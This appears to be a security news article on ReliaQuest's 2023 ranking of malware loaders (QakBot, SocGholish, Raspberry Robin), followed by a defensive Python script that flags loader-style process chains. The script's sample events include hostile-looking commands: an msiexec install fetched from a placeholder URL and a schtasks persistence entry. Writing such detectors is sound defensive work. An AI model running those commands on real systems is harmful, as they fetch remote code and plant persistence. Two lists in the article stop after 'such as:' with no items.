SOC teams find malware loaders challenging because different loaders, even ones delivering the same malware, require distinct mitigations.
Loaders are also the key component of initial network access and payload delivery, and the payloads most often sought are remote-access software and post-exploitation tools.
Detecting a malware loader does not always mean the network has been compromised, since the loader is sometimes stopped early in the kill chain.
Cybersecurity analysts at ReliaQuest have recently identified the malware loaders observed to be the most active in 2023.
Unveiled Malware Loaders
Below are the malware loaders recently identified by the cybersecurity experts at ReliaQuest:
Among them, the three loaders the researchers observed to be the most active are:
- QBot (aka QakBot, QuackBot, Pinkslipbot)
- SocGholish (aka FakeUpdates)
- Raspberry Robin
Technical Analysis of Top 3 Malware Loaders
Below is the technical analysis of the three most active malware loaders:
QakBot started as a banking trojan and quickly evolved to add more functions. Beyond gaining network entry, it:
- Spreads payloads
- Steals data
- Aids lateral movement
- Enables remote execution
QBot is linked to the “Black Basta” ransomware gang and performs discovery, C2 communication, information relay, and payload dropping in support of post-exploitation goals.
QakBot quickly adapted to Microsoft’s Mark of the Web (MOTW) protections by using HTML smuggling. It also shifted payload file types, even using OneNote files in a February 2023 campaign against US entities.
SocGholish is tied to the Russia-based group “Evil Corp,” which targets US industries such as:
It is also connected to “Exotic Lily,” an initial access broker that sells access gained through phishing to other threat actors, including ransomware groups.
This malware loader emerged in 2022, spreading through compromised websites and social engineering. With just a few clicks, it can impact entire domains or networks, and in 2023 it aggressively launched several watering hole attacks.
Raspberry Robin is a highly elusive worm-turned-loader that targets users and entities using Microsoft Windows OS. It spreads through malicious USB devices, using LNK files to trigger native Windows processes and download its DLL.
This loader also uses many techniques to evade detection, including scheduled task creation and code injection.
Raspberry Robin is linked to multiple dangerous groups, including Evil Corp and Silence (aka Whisper Spider).
Besides Cobalt Strike, threat actors use Raspberry Robin to deliver multiple ransomware variants and other malware, such as:
Raspberry Robin has also been linked to SocGholish operations against legal and financial services organizations in Q1 2023, signaling collaboration between crime syndicates.
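The behaviours described above for QakBot (OneNote lures) and Raspberry Robin (USB LNK files launching native Windows binaries to fetch a DLL, plus scheduled-task persistence) can be turned into simple detection heuristics over process-creation telemetry. The following is an added example, not code from ReliaQuest or the article; the event fields, the binary lists, the drive-letter and path assumptions, and all sample events are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Native Windows binaries that loaders abuse to fetch or run a DLL (assumed list for illustration).
NATIVE_LAUNCHERS = {"rundll32.exe", "regsvr32.exe", "msiexec.exe", "odbcconf.exe", "cmd.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
NON_SYSTEM_DRIVE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)  # assumption: C: is the fixed system drive
URL = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.IGNORECASE)

@dataclass
class ProcEvent:
    parent: str    # parent image name, e.g. "explorer.exe"
    image: str     # child image name
    cmdline: str   # child command line

def classify(ev: ProcEvent) -> list[str]:
    """Return the loader heuristics this event matches; an empty list means nothing suspicious."""
    par, img, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline
    hits = []
    # Raspberry Robin-style chain: a USB LNK opened from explorer.exe launches a native binary
    # that pulls a DLL from a URL or from the removable drive itself.
    if par == "explorer.exe" and img in NATIVE_LAUNCHERS and (URL.search(cmd) or NON_SYSTEM_DRIVE.search(cmd)):
        hits.append("usb-lnk-native-launcher")
    # QakBot OneNote-lure pattern: the OneNote process spawning a script host.
    if par == "onenote.exe" and img in SCRIPT_HOSTS:
        hits.append("onenote-script-host")
    # Persistence commonly seen with loaders: a scheduled task whose action lives in a user-writable path.
    if img == "schtasks.exe" and "/create" in cmd.lower() and USER_WRITABLE.search(cmd):
        hits.append("schtasks-user-writable-path")
    return hits

def scan(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Map each matching command line to the heuristics it triggered."""
    return {ev.cmdline: h for ev in events if (h := classify(ev))}

# Constructed sample events (not real telemetry): one per heuristic plus two benign controls.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "msiexec.exe", r"msiexec.exe /q /i http://example.invalid/pkg.msi"),
    ProcEvent("explorer.exe", "cmd.exe", r'cmd.exe /c "E:\recovery\run.bat"'),
    ProcEvent("onenote.exe", "wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\open.wsf"),
    ProcEvent("cmd.exe", "schtasks.exe", r'schtasks.exe /create /tn Updater /tr "C:\ProgramData\u.dll"'),
    ProcEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\u\notes.txt"),
    ProcEvent("services.exe", "schtasks.exe", r'schtasks.exe /create /tn Office /tr "C:\Program Files\x.exe"'),
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS).items():
        print(hits, cmd)
```

In production the same heuristics would be fed from Sysmon or EDR process-creation events and tuned against the environment's baseline, since non-C: drive letters and user-writable paths also occur in legitimate activity.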